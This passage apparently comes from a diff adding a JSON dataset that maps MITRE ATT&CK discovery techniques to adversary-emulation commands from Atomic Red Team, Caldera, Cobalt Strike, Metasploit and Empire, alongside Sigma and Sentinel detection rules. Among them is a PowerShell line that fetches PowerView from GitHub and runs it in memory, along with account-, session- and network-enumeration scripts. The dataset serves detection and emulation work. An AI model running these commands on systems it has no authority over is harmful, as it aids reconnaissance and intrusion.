"car.2016-03-001" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "tasklist", + "net time", + "systeminfo", + "whoami", + "nbtstat", + "net start", + "*\\net1 start", + "qprocess", + "nslookup", + "hostname.exe", + "*\\net1 user /domain", + "*\\net1 group /domain", + "*\\net1 group \"domain admins\" /domain", + "*\\net1 group \"Exchange Trusted Subsystem\" /domain", + "*\\net1 accounts /domain", + "*\\net1 user net localgroup administrators", + "netstat -an" + ] + }, + "timeframe": "15s", + "condition": "selection | count() by CommandLine > 4" + }, + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "level": "medium" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance metadata", + "description": "Data and information that describe an instance and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "instance" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://securelist.com/muddywater/88059/", + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1033", + "command_list": [ + "whoami /all /fo list", + "shell whoami /all /fo list", + "getuid", + "cmd.exe /C whoami\nwmic useraccount get /ALL\nquser /SERVER:\"localhost\"\nquser\nqwinsta.exe /server:localhost\nqwinsta.exe\nfor /F \"tokens=1,2\" %i in ('qwinsta /server:localhost ^| findstr \"Active Disc\"') do @echo %i | find /v \"#\" | find /v \"console\" || echo %j > computers.txt\n@FOR /F %n in (computers.txt) DO @FOR /F \"tokens=1,2\" %i in ('qwinsta /server:%n ^| findstr \"Active Disc\"') do @echo %i | find /v \"#\" | find /v \"console\" || echo %j > usernames.txt\n", + "users\nw\nwho\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose\n", + "[System.Environment]::UserName | Out-File -FilePath .\\CurrentactiveUser.txt \n$env:UserName | Out-File -FilePath .\\CurrentactiveUser.txt -Append\n", + "[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\\CurrentUserObject.txt\n", + "Import-Module .\\powerview.ps1 -Force;\nGet-NetUser -AdminCount | ConvertTo-Json -Depth 1\n", + "whoami\n", + "whoami", + "$env:username\n", + "echo %username%", + "Import-Module .\\powerview.ps1 -Force;\nGet-NetUser -SPN | ConvertTo-Json -Depth 1\n", + "powershell/situational_awareness/network/bloodhound", + "powershell/situational_awareness/network/powerview/get_session" + ], + "commands": [ + { + "command": "whoami /all /fo list", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell whoami /all /fo list", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "getuid", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "cmd.exe /C whoami\nwmic useraccount get /ALL\nquser /SERVER:\"localhost\"\nquser\nqwinsta.exe /server:localhost\nqwinsta.exe\nfor /F \"tokens=1,2\" %i in ('qwinsta /server:localhost ^| findstr \"Active Disc\"') do @echo %i | find /v \"#\" | find /v \"console\" || echo %j > computers.txt\n@FOR /F %n in (computers.txt) DO @FOR /F \"tokens=1,2\" %i in ('qwinsta /server:%n ^| findstr \"Active Disc\"') do @echo %i | find /v \"#\" | find /v \"console\" || echo %j > usernames.txt\n", + "source": "atomics/T1033/T1033.yaml", + "name": "Atomic Red Team Test - System Owner/User Discovery" + }, + { + "command": "users\nw\nwho\n", + "source": "atomics/T1033/T1033.yaml", + "name": "Atomic Red Team Test - System Owner/User Discovery" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose\n", + "source": "atomics/T1033/T1033.yaml", + "name": "Atomic Red Team Test - System Owner/User Discovery" + }, + { + "command": "[System.Environment]::UserName | Out-File -FilePath .\\CurrentactiveUser.txt \n$env:UserName | Out-File -FilePath .\\CurrentactiveUser.txt -Append\n", + "source": "atomics/T1033/T1033.yaml", + "name": "Atomic Red Team Test - System Owner/User Discovery" + }, + { + "command": "[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\\CurrentUserObject.txt\n", + "source": "atomics/T1033/T1033.yaml", + "name": "Atomic Red Team Test - System Owner/User Discovery" + }, + { + "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetUser -AdminCount | ConvertTo-Json -Depth 1\n", + "source": "data/abilities/discovery/aaf34d82-aea9-4278-8ec4-789653e4f5d9.yml", + "name": "Get Administrator users for a computer" + }, + { + "command": "whoami\n", + "source": "data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml", + "name": "Obtain user from current session" + }, + { + "command": "whoami", + "source": "data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml", + "name": "Find user running agent" + }, + { + "command": "$env:username\n", + "source": "data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml", + "name": "Find user running agent" + }, + { + "command": "echo %username%", + "source": "data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml", + "name": "Find user running agent" + }, + { + "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetUser -SPN | ConvertTo-Json -Depth 1\n", + "source": "data/abilities/discovery/f1cf4ea1-43f0-4604-9537-3d1b1b2d5b1c.yml", + "name": "Get Service Accounts for a domain" + }, + { + "command": "powershell/situational_awareness/network/bloodhound", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_session", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1033", + "Built-in Windows Command": "whoami /all /fo list", + "Cobalt Strike": "shell whoami /all /fo list", + "Metasploit": "getuid", + "Description": "Get current user information, SID, domain, groups the user belongs to, security privs of the user" + }, + { + "attack_technique": "T1033", + "display_name": "System Owner/User Discovery", + "atomic_tests": [ + { + "name": "System Owner/User Discovery", + "auto_generated_guid": "4c4959bf-addf-4b4a-be86-8d09cc1857aa", + "description": "Identify System owner or users on an endpoint.\n\nUpon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. \nAdditionally, two files will be written to disk - computers.txt and usernames.txt.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "computer_name": { + "description": "Name of remote computer", + "type": "String", + "default": "localhost" + } + }, + "executor": { + "command": "cmd.exe /C whoami\nwmic useraccount get /ALL\nquser /SERVER:\"#{computer_name}\"\nquser\nqwinsta.exe /server:#{computer_name}\nqwinsta.exe\nfor /F \"tokens=1,2\" %i in ('qwinsta /server:#{computer_name} ^| findstr \"Active Disc\"') do @echo %i | find /v \"#\" | find /v \"console\" || echo %j > computers.txt\n@FOR /F %n in (computers.txt) DO @FOR /F \"tokens=1,2\" %i in ('qwinsta /server:%n ^| findstr \"Active Disc\"') do @echo %i | find /v \"#\" | find /v \"console\" || echo %j > usernames.txt\n", + "name": "command_prompt" + } + }, + { + "name": "System Owner/User Discovery", + "auto_generated_guid": "2a9b677d-a230-44f4-ad86-782df1ef108c", + "description": "Identify System owner or users on an endpoint\n\nUpon successful execution, sh will stdout list of usernames.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "users\nw\nwho\n", + "name": "sh" + } + }, + { + "name": "Find computers where user has session - Stealth mode (PowerView)", + "auto_generated_guid": "29857f27-a36f-4f7e-8084-4557cd6207ca", + "description": "Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose\n", + "name": "powershell" + } + }, + { + "name": "User Discovery With Env Vars PowerShell Script", + "auto_generated_guid": "dcb6cdee-1fb0-4087-8bf8-88cfd136ba51", + "description": "Use the PowerShell environment variables to identify the current logged user.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[System.Environment]::UserName | Out-File -FilePath .\\CurrentactiveUser.txt \n$env:UserName | Out-File -FilePath .\\CurrentactiveUser.txt -Append\n", + "cleanup_command": "Remove-Item -Path .\\CurrentactiveUser.txt -Force\n", + "name": "powershell" + } + }, + { + "name": "GetCurrent User with PowerShell Script", + "auto_generated_guid": "1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b", + "description": "Use the PowerShell \"GetCurrent\" method of the WindowsIdentity .NET class to identify the logged user.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\\CurrentUserObject.txt\n", + "cleanup_command": "Remove-Item -Path .\\CurrentUserObject.txt -Force\n", + "name": "powershell" + } + } + ] + }, + { + "id": "aaf34d82-aea9-4278-8ec4-789653e4f5d9", + "name": "GetAdminMembers", + "description": "Get Administrator users for a computer", + "tactic": "discovery", + "technique": { + "attack_id": "T1033", + "name": "System Owner/User Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetUser -AdminCount | ConvertTo-Json -Depth 1\n", + "parsers": { + "plugins.stockpile.app.parsers.json": [ + { + "source": "domain.user.name", + "custom_parser_vals": { + "json_key": "samaccountname", + "json_type": "str" + } + } + ] + }, + "payloads": [ + "powerview.ps1" + ] + } + } + } + }, + { + "id": "bd527b63-9f9e-46e0-9816-b8434d2b8989", + "name": "Current User", + "description": "Obtain user from current session", + "tactic": "discovery", + "technique": { + "attack_id": "T1033", + "name": "System Owner/User Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "whoami\n" + } + }, + "linux": { + "sh": { + "command": "whoami\n" + } + }, + "windows": { + "psh": { + "command": "whoami\n" + } + } + } + }, + { + "id": "c0da588f-79f0-4263-8998-7496b1a40596", + "name": "Identify active user", + "description": "Find user running agent", + "tactic": "discovery", + "technique": { + "attack_id": "T1033", + "name": "System Owner/User Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "whoami", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.user.name" + }, + { + "source": "domain.user.name" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "whoami", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.user.name" + }, + { + "source": "domain.user.name" + } + ] + } + } + }, + "windows": { + "psh": { + "command": "$env:username\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.user.name" + }, + { + "source": "domain.user.name" + } + ] + } + }, + "cmd": { + "command": "echo %username%", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.user.name" + }, + { + "source": "domain.user.name" + } + ] + } + } + } + } + }, + { + "id": "f1cf4ea1-43f0-4604-9537-3d1b1b2d5b1c", + "name": "GetServiceAccounts", + "description": "Get Service Accounts for a domain", + "tactic": "discovery", + "technique": { + "attack_id": "T1033", + "name": "System Owner/User Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetUser -SPN | ConvertTo-Json -Depth 1\n", + "parsers": { + "plugins.stockpile.app.parsers.json": [ + { + "source": "domain.user.name", + "custom_parser_vals": { + "json_key": "samaccountname", + "json_type": "str" + } + } + ] + }, + "payloads": [ + "powerview.ps1" + ] + } + } + } + }, + { + "Empire Module": "powershell/situational_awareness/network/bloodhound", + "ATT&CK Technique #1": "T1033", + "ATT&CK Technique #2": "", + "Technique": "System Owner/User Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/bloodhound\": [\"T1033\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_session", + "ATT&CK Technique #1": "T1033", + "ATT&CK Technique #2": "", + "Technique": "System Owner/User Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_session\": [\"T1033\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"whoami.exe\"or process_command_line contains \"whoami\"or file_directory contains \"useraccount get /ALL\"or process_path contains \"qwinsta.exe\"or process_path contains \"quser.exe\"or process_path contains \"systeminfo.exe\")", + "name": "System Owner User Discovery" + } + ], + "possible_detections": [ + { + "title": "System Owner or User Discovery", + "id": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", + "status": "experimental", + "description": "Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.yaml" + ], + "logsource": { + "product": "linux", + "service": "auditd" + }, + "detection": { + "selection": { + "type": "EXECVE", + "a0": [ + "users", + "w", + "who" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Admin activity" + ], + "level": "low", + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + { + "title": "Whoami Execution", + "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", + "status": "experimental", + "description": "Detects the execution of whoami, which is often used by attackers after exloitation / privilege escalation but rarely used by administrators", + "references": [ + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/" + ], + "author": "Florian Roth", + "date": "2018/08/13", + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\whoami.exe" + }, + "selection2": { + "OriginalFileName": "whoami.exe" + }, + "condition": "selection or selection2" + }, + "falsepositives": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "PowerShell" + ], + [ + "4624", + "WMI Auth" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "200-500", + " 4100-4104", + "PowerShell" + ], + [ + "", + "4624", + "WMI Auth" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://securelist.com/muddywater/88059/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1016", + "command_list": [ + "ipconfig /all", + "shell ipconfig", + "ipconfig\npost/windows/gather/enum_domains", + "arp -a\nroute print", + "shell arp -a", + "route", + "nbtstat -a {IP | COMP_NAME }", + "shell c:\\windows\\sysnative\\nbstat.exe -a {IP | COMP_NAME}", + "ipconfig /all\nnetsh interface show interface\narp -a\nnbtstat -n\nnet config\n", + "netsh advfirewall firewall show rule name=all\n", + "if [ -x \"$(command -v arp)\" ]; then arp -a; else echo \"arp is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ifconfig)\" ]; then ifconfig; else echo \"ifconfig is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ip)\" ]; then ip addr; else echo \"ip is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v netstat)\" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo \"netstat is missing from the machine. skipping...\"; fi;\n", + "ipconfig /all\nnet config workstation\nnet view /all /domain\nnltest /domain_trusts\n", + "$ports = Get-content #{port_file}\n$file = \"$env:USERPROFILE\\Desktop\\open-ports.txt\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", + "$ports = Get-content #{port_file}\n$file = \"#{output_file}\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", + "$ports = Get-content PathToAtomicsFolder\\T1016\\src\\top-128.txt\n$file = \"#{output_file}\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=subnet)\n", + "PathToAtomicsFolder\\T1016\\src\\qakbot.bat\n", + "sudo defaults read /Library/Preferences/com.apple.alf\nsudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate\n", + "nbtstat -n\n", + "ping #{remote.host.fqdn}\n", + "./#{payload:9f639067-370a-40ba-b7ac-6f1c15d5a158} scan\n", + ".\\#{payload:28f9bf43-4f14-4965-9bd9-b70fd6993d8e} -Scan\n", + "./wifi.sh pref\n", + ".\\wifi.ps1 -Pref\n", + "for ip in $(seq 190 199); do ping -c 1 $(echo #{domain.broadcast.ip} |\ncut -d. -f-3).$ip -W 1; done\n", + "ifconfig | grep broadcast", + "sudo ifconfig\n", + "ipconfig\n", + "powershell/situational_awareness/host/dnsserver", + "powershell/situational_awareness/host/get_proxy", + "powershell/situational_awareness/network/arpscan", + "powershell/situational_awareness/network/powerview/get_subnet" + ], + "commands": [ + { + "command": "ipconfig /all", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell ipconfig", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "ipconfig\npost/windows/gather/enum_domains", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "arp -a\nroute print", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell arp -a", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "route", + "source": 